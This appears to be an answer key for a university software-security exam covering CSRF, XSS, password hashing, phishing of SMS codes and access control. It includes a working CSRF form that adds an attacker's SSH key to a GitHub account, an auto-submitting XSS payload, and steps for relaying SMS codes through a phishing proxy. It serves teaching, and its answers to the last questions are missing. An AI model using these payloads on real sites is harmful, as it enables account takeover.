INF226 Exam Autumn 2021

Exercise 1

a) Where in the memory layout of a C program does the call stack lie?

The stack is near the "top" of the user address space (somewhere around 0x7ffffffffff0 on 64-bit Linux) and grows downward toward lower addresses.

b) How can address space layout randomization (ASLR) make it more difficult for an attacker to perform return oriented programming?

The program code and all libraries are at random locations, so you don't know what addresses to return to, and stack is at a random location, so it's difficult to read/write directly from/to stack locations.

(E.g., stack is at 0x7fff7237b000 rather than 0x7ffffffffff0, C library gets loaded at 0x7f315233b000 instead of 0x7f9de7969000)

c) What does the Secure flag on a cookie indicate?

The cookie can only be sent over a secure connection (HTTPS).
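
As a minimal sketch of where the flag shows up in practice, the snippet below builds the value of a Set-Cookie response header by hand. The helper name sessionCookieHeader and the cookie name session are made up for illustration; a real application would normally let its web framework set these attributes.

```javascript
// Hypothetical helper: builds the value of a Set-Cookie response header.
function sessionCookieHeader(sessionId) {
  return [
    `session=${encodeURIComponent(sessionId)}`,
    "Secure",       // only sent over HTTPS
    "HttpOnly",     // not readable from page scripts
    "SameSite=Lax", // limits cross-site sending (see Exercise 2)
    "Path=/",
  ].join("; ");
}

console.log(sessionCookieHeader("abc123"));
```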

d) Why should untrusted data not be inserted directly into a SQL query using string concatenation?

Mixes program code with data, input data can be misunderstood as code to be executed. (Code injection attack.)
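
A small sketch of the difference, with no database involved: the first function builds the query by concatenation, the second keeps the query text and the values apart. The function names and the users table are assumptions for illustration. The `$1` placeholder and the `{ text, values }` shape follow the style some drivers accept (node-postgres, for example); placeholder syntax varies by driver.

```javascript
// Unsafe: the input becomes part of the SQL text itself.
function unsafeQuery(name) {
  return "SELECT * FROM users WHERE name = '" + name + "'";
}

// Safer: the SQL text is fixed; the value travels separately as data.
function parameterizedQuery(name) {
  return { text: "SELECT * FROM users WHERE name = $1", values: [name] };
}

const input = "x' OR '1'='1";
console.log(unsafeQuery(input));        // the WHERE clause now contains an injected OR
console.log(parameterizedQuery(input)); // query text unchanged, input kept as a value
```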

e) Why do we add salt to a key derivation function when implementing password based authentication?

Makes an attack more difficult by ensuring that the same password doesn't always hash to the same hash code. (One leak doesn't expose all passwords.)

hash("passw0rd" + 77): salt=77, hash=64222cbfdbf
hash("passw0rd" + 42): salt=42, hash=6784213abcd
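
A minimal sketch of salted password hashing using Node's built-in crypto module. The choice of scrypt, the 16-byte salt and the 32-byte output are assumptions made for the example, not something the exam prescribes; hashPassword and verifyPassword are illustrative names.

```javascript
const crypto = require("node:crypto");

// Derive a hash from a password and a per-user random salt using scrypt.
function hashPassword(password, salt = crypto.randomBytes(16)) {
  const hash = crypto.scryptSync(password, salt, 32);
  return { salt: salt.toString("hex"), hash: hash.toString("hex") };
}

// Recompute the hash with the stored salt and compare in constant time.
function verifyPassword(password, stored) {
  const candidate = crypto.scryptSync(password, Buffer.from(stored.salt, "hex"), 32);
  return crypto.timingSafeEqual(candidate, Buffer.from(stored.hash, "hex"));
}

const a = hashPassword("passw0rd");
const b = hashPassword("passw0rd");
console.log(a.hash === b.hash);             // same password, different random salts
console.log(verifyPassword("passw0rd", a)); // check against the stored salt and hash
```

Because each user gets a different salt, a precomputed table for one salt is useless for the others.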

f) What is the difference between static and dynamic program analysis?

Program analysis tries to predict or measure how a program will behave in many (or all possible) circumstances.
Static program analysis example: type checking; predicting null pointer exceptions; tracing tainted data
Dynamic program analysis example: code coverage or testing directed by code coverage; tools for detecting memory leaks and race conditions; tracing tainted data; just running the program (not very useful as analysis, though); running the program in a debugger (slightly more useful)

Dynamic program analysis works with real (or simulated) input and can give more precise but less general answers; static analysis makes estimates based on what can happen, will need to make some assumptions, is more likely to detect problems that aren't there, but can much more definitely say that a problem isn't there. [Type check fails? Type error might never happen in real life. Type check succeeds? There are no type errors (of the kind the type checker can find).]

Exercise 2

a) Explain how an attacker could use CSRF to insert their own public key into a victim’s list of trusted keys. What would the victim need to do in order for the attack to begin?

Pre-fill the form with the attacker's details, trick the victim into clicking on it while logged in to GitHub/GitLab.

<form id="new_key" action="https://github.com/profile/keys" method="POST">
<p>Paste your public SSH key.</p>
<textarea name="key[key]" id="key_key">ssh-rsa …+93fuyVrop7AnmhJG5CXT1wwFdnSwzNEjtgkT+Ywjc6ARW…== anya</textarea>
<label class="label-bold" for="key_title"></label>
<input hidden="true" name="key[title]" id="key_title" value="Per Olav's totally normal SSH key">
<input type="submit" name="commit" value="Send me my free T-shirt">
</form>

(Or see tricks to submit automatically later.)

b) Would the CSRF be prevented if the SameSite flag on the session cookie was set to ‘Lax’? Why/why not?

SameSite Lax means cookies are sent with top-level GET navigations from other sites (e.g., following a link), but not with cross-site POST requests, so it would prevent this attack (since the form will be POSTed).

[Extra details: SameSite Strict – no requests from other sites will have cookies sent with them. SameSite None – always send cookies (modern browsers require Secure as well). A CSRF token would also prevent the attack.]
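
The CSRF token idea can be sketched as follows, assuming the server keeps one random token per session and embeds it in a hidden form field. The function names are hypothetical, and session storage is left out.

```javascript
const crypto = require("node:crypto");

// Server side: create a random token, store it in the session, embed it in the form.
function newCsrfToken() {
  return crypto.randomBytes(32).toString("hex");
}

// Server side: accept a state-changing request only if the submitted token matches.
function csrfTokenMatches(sessionToken, submittedToken) {
  const a = Buffer.from(String(sessionToken));
  const b = Buffer.from(String(submittedToken));
  // timingSafeEqual throws on unequal lengths, so check the length first
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

const token = newCsrfToken();
console.log(csrfTokenMatches(token, token));     // form rendered by the real site
console.log(csrfTokenMatches(token, "guessed")); // form forged by another site
```

The attacker's page cannot read the token from the victim's session, so the forged form cannot include a matching value.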

c) How would the security of the form be affected if method was set to “GET” instead of “POST”?

GET – can be put in a link, the link could be placed in a stylesheet, for example

   background-image: url(https://github.com/profile/keys?key=HKDKJASHLJSHLJA&title=MyKey)

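GET – will have cookies sent along if the policy is None, or if the policy is Lax and the request is a top-level navigation (e.g., the victim clicks a link; subresource loads such as the background image above get no cookies under Lax). POST is more restrictive (cookies only sent with SameSite None).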

Exercise 3

a) Explain why the above code is vulnerable to cross-site scripting.

It inserts strings into HTML code that gets sent to the browser, without sanitizing the strings. So, they could contain <script> tags with code to be executed – or elements with onclick=, onblur=, onerror=, or style=.

b) How would you fix this vulnerability?

One or more of these:

Quote/escape all special characters, e.g., < → &lt;.
Parse it as HTML, strip all non-whitelisted tags (EM, B, SUP, SUB, A)
Some other version of strip all non-whitelisted tags
Allow messages formatted as Markdown (without HTML) or with fancy editor (note: user might still be able to paste some HTML code by copying preformatted text from a browser window)
On the client side, build the message display document tree/fragment, insert data directly into the DOM with msgElement.innerText = msgData.message.
Use a safe templating system
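
The first option (escaping) can be sketched as below. escapeHtml is an illustrative helper, not part of the exam code, and it only covers text placed in element content or quoted attribute values; other contexts need other rules.

```javascript
// Replace the characters that are special in HTML text and quoted attributes.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml('<img src=x onerror="alert(1)">'));
// prints: &lt;img src=x onerror=&quot;alert(1)&quot;&gt;
```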

From discussion of OWASP XSS Cheat Sheet

Defence philosophy (yes! very important): Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance.

Escaping is annoyingly different for all languages:

URL encoding: '\n' => %0a
HTML encoding: '\n' => &#x0a; – but attributes have different rules
JS encoding: '\n' => \n
CSS: \xx or \xxxxxx
What about URLs in attributes (like <a href="…">)?
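
To see how the same character comes out in each context, here is a small sketch. encodeURIComponent and JSON.stringify are standard JavaScript; htmlNumericRef and cssEscape are hand-written helpers made up for this example.

```javascript
// HTML numeric character reference, e.g. &#x0a;
const htmlNumericRef = (ch) => `&#x${ch.codePointAt(0).toString(16).padStart(2, "0")};`;
// CSS escape: backslash, hex code point, and a space that terminates the escape
const cssEscape = (ch) => `\\${ch.codePointAt(0).toString(16)} `;

const raw = "\n";
console.log(encodeURIComponent(raw)); // URL encoding: %0A
console.log(htmlNumericRef(raw));     // HTML encoding: &#x0a;
console.log(JSON.stringify(raw));     // JS string literal: "\n"
console.log(cssEscape(raw));          // CSS escape: \a followed by a space
```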

Good solutions:

Framework's template system (but be careful about functions that allow raw data to be inserted; and be careful when building templates by string concatenation (template/format string injection problem!))
JavaScript templates: html`<em>${var1}</em>` – parses and constructs document tree before inserting data!
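Insert data into DOM tree via JavaScript – safe against markup injection: elem.textContent = '…', someLink.setAttribute('href', myURL) (see also someLink.href = …). URLs still need a scheme check, since a javascript: URL in href runs when clicked.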

Totally not safe:

someLink.outerHTML = '<a href="' + myURL + '">link text</a>'
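
For the question of URLs in attributes raised above, one common precaution is to check the URL scheme before using it as an href. The sketch below uses the standard URL class; isSafeHref and the placeholder base URL are assumptions for illustration.

```javascript
// Accept only http(s) URLs; relative URLs are resolved against a placeholder base.
function isSafeHref(rawUrl, base = "https://example.invalid/") {
  try {
    const url = new URL(rawUrl, base);
    return url.protocol === "http:" || url.protocol === "https:";
  } catch {
    return false; // not parseable as a URL at all
  }
}

console.log(isSafeHref("https://www.uib.no/"));     // true
console.log(isSafeHref("/channel/SuperChannel"));   // true (relative URL)
console.log(isSafeHref("javascript:alert(1)"));     // false
```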

c) What message would an attacker send in order to cause a user viewing the message to send a message to a channel? To be specific, assume that the channel is called “SuperChannel”, and that the attacker wants the user to post the message “XYZZY”. For reference, the source code for the message sending form is below.

<script>
    // submit when page is loaded – alternatively add an event handler to one of the elements
    document.addEventListener('DOMContentLoaded', (e) => {
        // you could also build and submit the form by script
        document.getElementById("myForm75").submit();
        // or if the unfilled form is already on the page
        const form = document.querySelector("form.entry");
        // fill in message data
        form.submit();
    });
</script>
<!-- this is display:none, so the user will see nothing -->
<form id="myForm75" style="display:none" class="entry" action="/channel/SuperChannel" method="post">
<div class="user">You</div> <!-- should probably be a 'user' form field -->
<input type="hidden" name="newmessage" value="Send">
<textarea id="messageInput" name="message">XYZZY</textarea>
</form>
<!-- the message the user will see -->
Did you hear the latest security joke? …

Exercise 4

a) How would you ensure that the users are likely to pick good passwords? What requirements and other measures would you put in place?

At least 8 characters
At least two of letter, number, symbol
Not something found in the dictionary
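
The three requirements above could be checked roughly like this. The word list is a tiny stand-in and checkPassword is a hypothetical name; a real system would use a large dictionary or a list of breached passwords.

```javascript
// Tiny stand-in word list; a real check would use a large dictionary or breach list.
const COMMON_WORDS = new Set(["password", "passw0rd", "qwertyuiop", "letmein123"]);

// Returns a list of problems; an empty list means the password passes.
function checkPassword(password) {
  const problems = [];
  if ([...password].length < 8) problems.push("shorter than 8 characters");
  // Count how many character classes occur: letter, number, anything else (symbol).
  const classes = [/\p{L}/u, /\p{N}/u, /[^\p{L}\p{N}]/u]
    .filter((re) => re.test(password)).length;
  if (classes < 2) problems.push("needs at least two of: letter, number, symbol");
  if (COMMON_WORDS.has(password.toLowerCase())) problems.push("found in the dictionary");
  return problems;
}

console.log(checkPassword("abc"));
console.log(checkPassword("passw0rd"));
console.log(checkPassword("correct horse 42"));
```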

Use an existing library to check passwords?
Have the site generate a password
Tell the users to not share the password, inform them of safe ways of storing passwords
Best to keep things fairly simple?

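SHA1 hash, ASCII (weak: fast and with no salt mentioned, so leaked hashes are exposed to rainbow tables and fast brute force)
Plaintext 4–6 digit numeric code (bad, immediate breach)
Argon2, Unicode (memory-hard function designed for password hashing, takes a salt; deliberately slow to brute force)
SHA256 + salt, Unicode (salt defeats rainbow tables, but SHA256 is fast, so brute forcing weak passwords stays cheap)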

hash("passw0rd" + salt)

b) Compare the four mechanisms above, from the perspective of a potential breach of the database. How would the various mechanisms fare against brute force, dictionary and rainbow table attacks?

Brute force – a numeric code is trivial to brute force. ASCII is more difficult; Unicode is very difficult, but only if users actually use more than the usual letters. The bigger the search space, the more difficult it is to use rainbow tables. The more salt, the more difficult it is to use rainbow tables.
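
To put rough numbers on the search spaces, the sketch below counts the candidates for a 6-digit code and for an 8-character password drawn from the 95 printable ASCII characters. Both the alphabet size and the length are assumptions for the example.

```javascript
// Number of candidate passwords: alphabetSize ** length (BigInt avoids rounding).
function searchSpace(alphabetSize, length) {
  return BigInt(alphabetSize) ** BigInt(length);
}

console.log(searchSpace(10, 6)); // 6-digit numeric code: 1000000n
console.log(searchSpace(95, 8)); // 8 printable ASCII characters: 6634204312890625n
```

A million candidates can be tried almost instantly, which is why the numeric code offers no protection once the database leaks.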

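In summary: I'd use option 4 – large search space for passwords, hashing is standard. (Option 3, Argon2, is also a strong choice: it is deliberately slow and memory-hard, which makes brute forcing leaked hashes more expensive.)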

c) How can SMS verification codes be vulnerable to phishing attacks, such as tricking the user to visiting a proxy site?

Easy:

Create similar webpage, with similar address (l vs i vs 1 confusion; www.dnb.no.myevilsite.com, www.dnb.no@myevilsite.com)
Get the user to log in, send password to legit site
Legit site sends SMS code
User enters code
You forward the code or use it yourself (distract the user with an error message)
=> man-in-the-middle attack

More difficult, but possible:

Trick the phone routing system SS7 to send SMS and calls to your laptop/software
(A lot more difficult with emails, unless you're the email provider.)

d) How could public key based two-factor authentication protect against a malicious proxy?

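Both sides can authenticate with keys/certificates, and the challenge/response (signed assertion) is handled by the system (browser and authenticator) rather than by the user typing a code into a potentially fake website. A proxy site has nothing useful to forward, because the signed response is tied to the site the browser is actually talking to.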
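
A heavily simplified sketch of why this helps, loosely modelled on how origin-bound schemes such as WebAuthn behave; it is not the actual protocol. The function names are hypothetical, the key type (Ed25519) is a choice made for the example, and the two origins reuse the addresses from the phishing example in (c).

```javascript
const crypto = require("node:crypto");

// Registration: the authenticator creates a key pair; the site stores the public key.
const { publicKey, privateKey } = crypto.generateKeyPairSync("ed25519");

// Authenticator side: sign the challenge together with the origin the browser is really on.
function signAssertion(challenge, browserOrigin) {
  const payload = Buffer.from(JSON.stringify({ challenge, origin: browserOrigin }));
  return crypto.sign(null, payload, privateKey);
}

// Server side: rebuild the payload with its own origin and check the signature.
function verifyAssertion(challenge, signature, expectedOrigin = "https://www.dnb.no") {
  const payload = Buffer.from(JSON.stringify({ challenge, origin: expectedOrigin }));
  return crypto.verify(null, payload, publicKey, signature);
}

const challenge = crypto.randomBytes(16).toString("hex");
const direct = signAssertion(challenge, "https://www.dnb.no");
const viaProxy = signAssertion(challenge, "https://www.dnb.no.myevilsite.com");
console.log(verifyAssertion(challenge, direct));   // true: signed for the real origin
console.log(verifyAssertion(challenge, viaProxy)); // false: signed for the proxy's origin
```

Unlike an SMS code, the signed response is useless when relayed, because it names the proxy's origin rather than the real site's.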

Exercise 5

a) Which kind of access control system is this? (Of the kinds we have discussed in class.)

Access control lists (ACLs): a list-based (permissions-based?) access control system.

b) What general class of security problems does the bot issue belong to? Explain in some detail why the problem belongs to this class. Hint: this class of problems is inherent to this kind of access control system.

The confused deputy problem – you let someone act on your behalf, but that someone has more rights than you, and you trick it into doing bad stuff.

It's difficult to stop, because the deputy has to redo the entire permissions check.

[On Unix, setuid programs often have confused deputy problems. The POSIX API has concepts like 'real' and 'effective' user, and complicated system calls like "am I allowed to read this file as the user I was before I temporarily changed to the user I am now?"]
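
A toy illustration of the problem, assuming an ACL in which the bot may post to SuperChannel but Mallory may not. The ACL contents, the user alice and all function names are invented for the example.

```javascript
// Hypothetical ACL: which principals may post to which channel.
const acl = { SuperChannel: new Set(["bot", "alice"]) };

function mayPost(principal, channel) {
  return acl[channel]?.has(principal) ?? false;
}

// Confused deputy: the bot only checks its own authority, not the requester's.
function botPostConfused(requester, channel, message) {
  return mayPost("bot", channel) ? `posted to ${channel}: ${message}` : "denied";
}

// Workaround within an ACL system: the bot redoes the check for the requester.
function botPostChecked(requester, channel, message) {
  return mayPost("bot", channel) && mayPost(requester, channel)
    ? `posted to ${channel}: ${message}`
    : "denied";
}

console.log(botPostConfused("mallory", "SuperChannel", "XYZZY")); // posted
console.log(botPostChecked("mallory", "SuperChannel", "XYZZY"));  // denied
```

The checked version works only as long as the bot duplicates every rule the channel enforces, which is the maintenance burden described above.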

c) Suggest a table schema for a capability based access control system for SafeChat, and explain your design. The system should have centrally controlled capability ownership stored in the database or unguessable tokens – choose what you find most appropriate.

When Mallory asks the bot to post a message, she should give it: (the message, her permission to post it, when it should be posted, where it should be posted)

JWT – JSON Web Tokens (might be what you get from OAuth 2.0)

data = {
    who: Mallory,
    permission: post,
    what_to_post: message,
    who_can_post: bot,
    …
}
signature = sign(data, mallorys_private_key)

Give the signature and data to the bot. When the bot wants to post something, it gives the message and signature to the channel (the thing that broadcasts). The channel can then see that Mallory is the one supposed to be posting and what the message is, check the signature against Mallory's public key (or some kind of certificate authority), and even verify that the bot is the one that was authorized to post on Mallory's behalf.
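
The signed-token idea can be sketched with Node's crypto module. This is not a real JWT implementation: the key type (Ed25519), the token layout and the function names are assumptions for illustration, and the channel is assumed to already know Mallory's public key.

```javascript
const crypto = require("node:crypto");

// Hypothetical key pair for Mallory; the channel is assumed to know her public key.
const mallory = crypto.generateKeyPairSync("ed25519");

// Mallory side: sign the capability data and hand payload + signature to the bot.
function issueCapability(data, privateKey) {
  const payload = JSON.stringify(data);
  const signature = crypto.sign(null, Buffer.from(payload), privateKey).toString("base64");
  return { payload, signature };
}

// Channel side: verify the signature, then check bearer and message against the payload.
function channelAccepts(token, bearer, message, issuerPublicKey) {
  const valid = crypto.verify(null, Buffer.from(token.payload), issuerPublicKey,
    Buffer.from(token.signature, "base64"));
  if (!valid) return false;
  const data = JSON.parse(token.payload);
  return data.permission === "post" && data.who_can_post === bearer &&
    data.what_to_post === message;
}

const token = issueCapability(
  { who: "Mallory", permission: "post", what_to_post: "XYZZY", who_can_post: "bot" },
  mallory.privateKey
);
console.log(channelAccepts(token, "bot", "XYZZY", mallory.publicKey)); // true
console.log(channelAccepts(token, "bot", "other", mallory.publicKey)); // false
```

The channel would still need to check separately that Mallory herself is allowed to post there; the signature only proves that the request really comes from her.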

d) How would transferring capabilities between users be done in the database schema you outlined?

e) How would revoking capabilities between users be done in this system?

f) How should the capabilities be organised for the bot to prevent the issues SafeChat has been struggling with? Give a concrete example, for instance using the situation with SuperChannel.
